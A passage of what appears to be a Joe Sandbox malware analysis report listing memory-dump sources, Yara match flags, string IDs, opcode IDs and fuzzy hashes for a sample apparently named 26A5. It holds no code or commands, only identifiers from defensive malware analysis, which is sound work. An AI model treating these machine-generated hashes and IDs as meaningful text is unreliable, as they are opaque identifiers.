                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: UXY^
                                                                                                                                                                                                                              • API String ID: 0-1486013802
                                                                                                                                                                                                                              • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                              • Instruction ID: 71888614aa0c6c6d5adfa3e320abb85fbca9b267193bfd1f53ef99a019696c06
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 949124B5604B818FD315CF29C990662FBA2FF96304B19869CC0D68FB16C739E806CF95
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
                                                                                                                                                                                                                              • Instruction ID: 4e43b3032b5f77b82ebf5265758dd730748cf5b28328c74b298a748a547da810
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87ffeb648b9d3b2ccfc57117cdf1fc242bb3e2d04f71168daa08cd74ffe209e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2915635E04225DFDB15CFA8D8907AEB7B2FF4A300F9980A9D502AB351D739AD42CB44
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                              • Instruction ID: 700ffd709b046e98a738f8658bbb39d2f757f329b9e8624cdca8d9a2599f2998
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ede958760def0fb47ef62c8d664d44c55fbe6b810f6c68a305d53f1873dda57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F81C0342452459FD725EF2CC8C0A2AB3F2EF89714F15856CEA958B3A0EB31E851CF45
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                                              • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                              • Instruction ID: 6564e7b3ad14b453794cbf2f19722db2d5742acb1a2f8ce2a072c031a44184fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23710432F083254BD714CE28E88071FBBE2ABC5710FA9852EE4958B391D239DD45878A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                                              • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                              • Instruction ID: f5b7b2f785c0ae977332cad2461a110c41e2a26345fcd1c023f2c2aef72439d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0711632B483565BD724CE28E88833EB7E2ABC6714F19C52DE4948B395D375DC54C782
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: _;=8
                                                                                                                                                                                                                              • API String ID: 0-3640539833
                                                                                                                                                                                                                              • Opcode ID: 1d81db7cde41a3e0fb3553ca3b72ed2fa4290f6dd7cddc566a2c3c75c2eae2db
                                                                                                                                                                                                                              • Instruction ID: e58a9c241393c577c0dbf69e703309a02622358f74323d7420d86702d8d0d07f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d81db7cde41a3e0fb3553ca3b72ed2fa4290f6dd7cddc566a2c3c75c2eae2db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 245112B0521B008BC7249F25C8616B3BBF1EF52345B084E5DC4C38BB45E739A948CBA5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: _;=8
                                                                                                                                                                                                                              • API String ID: 0-3640539833
                                                                                                                                                                                                                              • Opcode ID: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                              • Instruction ID: 2570ee2af580b21814618915d229dcebe8c1cf6c84a092dbd66ed465b1653980
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cde9169defac7f2d6903167d29639d2391a51efbddd28276b42fe9cde3aea7aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21510FB0551B508BC738DF25C8616B3BBF1EF42349B084A9CC8D38BA45E739A509CBA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *+
                                                                                                                                                                                                                              • API String ID: 0-2181965719
                                                                                                                                                                                                                              • Opcode ID: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                                                                                                                                              • Instruction ID: 1aca12f7bddcf8e3ec6d515fa7c5fe26dfefe36cf0adda751b27a2fb15c9c371
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bbcc82fd047366a200e277a7b52cff4fec95a2559de0f56e174b4bebb18c894
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A56110B144A3818BD3708F2588927DBFBE2AF96318F54895CD5C89B254EB394146CB87
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 2994545307-1045509717
                                                                                                                                                                                                                              • Opcode ID: 729b3e7d6e3191008210f842740a6d9190df207d04178a60961e4fc3c3af6df3
                                                                                                                                                                                                                              • Instruction ID: a4b821128decaa172c514915c42a23315f051a59fcda10375df645c6c4b50b9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 729b3e7d6e3191008210f842740a6d9190df207d04178a60961e4fc3c3af6df3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF417C759043146BE310EF24ECC1B6BB7A4EF89708F10942EF985A7251E735EC04879A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                              • Instruction ID: 9bd152582fb21ed2ed0b319dc6947b94a169a8252a5efb017b4eee9f34d16f7a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40df236e589d81010455b97f2d2192286a205d1063d17ff6a38768a85cdfa26a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C414771A443146FE714AE64DC80BABBBB5EFC5B48F25842DED8597150E732E804CBD2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: }I\
                                                                                                                                                                                                                              • API String ID: 0-3759065986
                                                                                                                                                                                                                              • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                              • Instruction ID: 06326f033c1d303d2a0c44ae50e6a95f42fac71f38a9198839615570ed5a6674
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 653126605546928BEB258F34C8A27B7BBB0FF47310F144759C8C18B785EB78A992CB85
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: }I\
                                                                                                                                                                                                                              • API String ID: 0-3759065986
                                                                                                                                                                                                                              • Opcode ID: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                              • Instruction ID: 07954d0b366465dacbab3945ca7a618e31af65bcf5dd80daffd366a41039d0ce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df1d40a0c1601d316635205874302e9800cae571c9b88acd49baf0bd568f005e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5318E705646928BDB11CF34C8D17B6BBF0FF4B214B144759C8C18B681EB38A586CF81
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: 2f3d0f86c51dd52561bd956f66a0919b21b2b2791d13a1f53376856cb036d1a9
                                                                                                                                                                                                                              • Instruction ID: 8a20e7fe1b623a90cf08abde6341ef23d370e4e0abb87f923b5925148121d2a1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3d0f86c51dd52561bd956f66a0919b21b2b2791d13a1f53376856cb036d1a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6611C634681630EED268AF199DD2B393262EB46718F164678F971920E1D7717890CA1D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 2994545307-1045509717
                                                                                                                                                                                                                              • Opcode ID: 59ed13ec8eb8bd8147eea6b0df157e6c9ae6c2307cf57b48e0fe75af3e9c5a7e
                                                                                                                                                                                                                              • Instruction ID: 0c7a45b7bc69abfe1ea4a300e8af6adda297262347155a361b302868447e3dd6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59ed13ec8eb8bd8147eea6b0df157e6c9ae6c2307cf57b48e0fe75af3e9c5a7e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF0D635904214BBD5104F49EC81D37737DE7CE768F141329E514122A2A732AD1186A9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
                                                                                                                                                                                                                              • Instruction ID: aee0571132dc65dfa99942fcd81fb29c5b33538da949cf953b5b3ab4a649ea96
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d7cfea0e4e327b9eda319c71044655f3c20aae259e9c189ca88ac76d4abae3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F0D675690218BBC2105B499C81D3B77BEEBCE768F140318F41852661A322E912CAA9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
                                                                                                                                                                                                                              • Instruction ID: 61d89167b6bfa56051b051737d24986942383605f8953121b9ed2a59e40700d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6146b7094830001aaaf13cb0f51437480e6ddd60403108575e1b98eecd2c1ab1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F090F4A9D612DFD6188F18DC8673E73A6EF86358F188538E095A7174D331A921CA0A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
                                                                                                                                                                                                                              • Instruction ID: c14077b8a130247762470a12415ef9365636b0c970e2bf5ce29861a99db5fcbf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0bff55706ff93967b4313bb2a1d7a7ee9ee426091711acca18b712e24a09905
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2F08238502120EEC7588F189EC157D73A2F747311729147EC406A31A0DF34ACD2C90E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
                                                                                                                                                                                                                              • Instruction ID: ed5546a6f72decacae07f64417e0364401a0c4df09bfb2729173ce1248ed7640
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fba0dd296d97388ae8806046d0d018cb5991b0a5fc03ca011737e50afd9cac09
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F0BE34649221EFD718DF08D890539B363FF86328FD982B8E8A8470A0C33078518A48
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: beb5adae6fff6175e383ddf1efeefbc8f00a994d28ce3fd0efda4cde5bc363b2
                                                                                                                                                                                                                              • Instruction ID: 893c73a3168edd6d9bfdec4a662e412097609be6038d39b59624d4fa8f544f05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: beb5adae6fff6175e383ddf1efeefbc8f00a994d28ce3fd0efda4cde5bc363b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99F08274A81025EFD7188B189888A3EF373FB46329F6D9124D515231E0D330BC22CA48
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: h.^
                                                                                                                                                                                                                              • API String ID: 0-1045509717
                                                                                                                                                                                                                              • Opcode ID: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
                                                                                                                                                                                                                              • Instruction ID: 85f90f05b7cd9740f0dd11be4e47d539d37879f59d8f753959adedc7e492877d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf2067ab6f32b58c45c9008d31a8987c58cfc8b8a777689b5c00e406fa9fe567
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72E08678B18231DBD6148F05F99163AB3A1EFD7305F98543F904657620E334AC02C68F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                              • Instruction ID: ccb3959594043c792932c0cfc7d39f61c3b1d77d2143a35f25ab615b2c98e1b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9812B432A0C7118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                              • Instruction ID: 153febf43f49eb6542ee093e26a70c6e8f84bc12be8c69ec9f03001053c7dbaf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8bb466db5d070fb099be5cdb0fd94ca4abf5b60ced88e2066174f7cb2904948
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E12D632A487118BC725DF18D8806BBF3E5FFC4319F198A2DD99997284DB34A916C742
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 06681fd06d7842ada82dae78e60d469ed9d6c6833ec0578904e50dff9852b5ef
                                                                                                                                                                                                                              • Instruction ID: 0c2c903ba8ab9d1616d7dcc2afe94072de716e40dc01c7b757aa9311b81398a3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06681fd06d7842ada82dae78e60d469ed9d6c6833ec0578904e50dff9852b5ef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41E1ED35609340CFD348CF68E89062BB7E2FB8A315F19897DE98687362D738E945CB45
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                                                                                                                                                                              • Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2140000_26A5.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
                                                                                                                                                                                                                              • Instruction ID: 38667e510a3b1cfa833c329e5f9639dd9e9631d561bcdc636f6a5dd6e956e3bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e66362c8fb9e42a485a20769d13899b4c0de8f0fb50873082383503af3f25fbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF1BD316487419FC324CF29C890A6BFBE6AFD9304F08992DE5D987351EB35E845CB92
